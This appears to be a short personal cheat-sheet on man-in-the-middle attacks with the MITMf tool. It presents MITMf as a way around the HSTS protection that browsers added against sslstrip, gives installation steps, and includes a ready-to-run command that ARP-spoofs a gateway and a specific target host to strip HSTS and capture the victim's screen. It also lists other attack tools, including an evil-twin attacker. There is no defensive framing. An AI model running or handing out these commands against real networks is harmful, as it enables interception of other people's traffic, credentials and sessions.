----------------------------------------- 2017 MITM (MITMF) ----------------------------------------- Browsers have been updated and now use HSTS which blocks Mitm attacks & sslstrip. You should try MITMF : https://github.com/byt3bl33d3r/MITMf It can override HSTS but its still a bit difficult if the target still has cookies from the previous session. ----------------------------------------- Install ----------------------------------------- apt-get install mitmf ----------------------------------------- Usage example ----------------------------------------- cd ~/MITMF python mitmf.py --arp --spoof --gateway 192.168.1.1 --target 192.168.1.76 -i wlan0 --hsts --screen ----------------------------------------- GitHub Install ----------------------------------------- apt-get install mitmf On Debian and derivatives (e.g Ubuntu, Kali Linux etc...) apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file -- Install virtualenvwrapper: pip install virtualenvwrapper -- Edit your .bashrc or .zshrc file to source the virtualenvwrapper.sh script: source /usr/bin/virtualenvwrapper.sh (The location of this script may vary depending on your Linux distro) -- Restart your terminal or run: source /usr/bin/virtualenvwrapper.sh -- Create your virtualenv: mkvirtualenv MITMf -p /usr/bin/python2.7 -- Clone the MITMf repository: git clone https://github.com/byt3bl33d3r/MITMf -- cd into the directory, initialize and clone the repos submodules: cd MITMf && git submodule init && git submodule update --recursive -- Install the dependencies: pip install -r requirements.txt -- You're ready to rock! python mitmf.py --help ----------------------------------------- Autres outils ----------------------------------------- ettercap -G wireshark driftnet 3viltwinattacker ------------------------------------